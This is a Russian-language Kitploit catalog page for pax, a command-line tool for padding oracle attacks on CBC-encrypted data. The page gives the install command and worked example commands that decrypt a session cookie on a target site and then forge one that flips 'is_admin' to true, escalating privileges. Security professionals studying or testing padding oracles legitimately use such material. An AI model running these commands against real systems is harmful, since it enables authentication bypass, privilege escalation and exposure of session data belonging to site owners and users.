Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
pax — :skull: :unlock: CLI-инструмент для атак на PKCS7 padding oracle | Kitploit
Инструменты/GitHubGitHub/liamg/pax
ЭксплуатацияЭксплуатация веб-приложенийКриптографияТестирование на Проникновение
GitHubliamg/pax

pax

💀 🔓 CLI-инструмент для атак на PKCS7 padding oracle

Репозиторий
142175 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

pax

Travis Build Status GoReportCard

Эксплуатируйте padding oracle ради удовольствия и прибыли!

Pax (PAdding oracle eXploiter) — это инструмент для эксплуатации padding oracle, позволяющий:

  1. Получить открытый текст для заданного фрагмента CBC-зашифрованных данных.
  2. Получить зашифрованные байты для заданного фрагмента открытого текста, используя неизвестный алгоритм шифрования, применяемый оракулом.

Это может быть использовано для раскрытия зашифрованной информации сеанса, а также часто для обхода аутентификации, повышения привилегий и удаленного выполнения кода путем шифрования собственного открытого текста и записи его обратно на сервер.

Как всегда, этот инструмент следует использовать только на системах, которые вам принадлежат и/или на которые у вас есть разрешение на проверку!

Установка

Скачайте из релизов или установите с помощью Go:

root@kitploit:~
go get -u github.com/liamg/pax/cmd/pax

Пример использования

Если вы нашли подозрительный оракул, где зашифрованные данные хранятся в cookie с именем SESS, вы можете использовать следующее:

root@kitploit:~
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

Это, вероятно, даст вам некоторый открытый текст, например:

root@kitploit:~
 {"user_id": 456, "is_admin": false}

Похоже, вы можете повысить здесь свои привилегии!

Вы можете попытаться сделать это, сначала сгенерировав собственные зашифрованные данные, которые оракул расшифрует обратно в хитрый открытый текст:

root@kitploit:~
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

Это выдаст другой набор зашифрованных данных в кодировке base64, например:

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Теперь вы можете открыть браузер и установить значение cookie SESS равным приведенному выше значению. Загрузив исходную страницу оракула, вы должны увидеть, что теперь вы повышены до уровня администратора.

Как это работает?

Ниже приведены отличные руководства по тому, как работает эта атака:

  • https://robertheaton.com/2013/07/29/padding-oracle-attack/
  • https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth
Скачать инструмент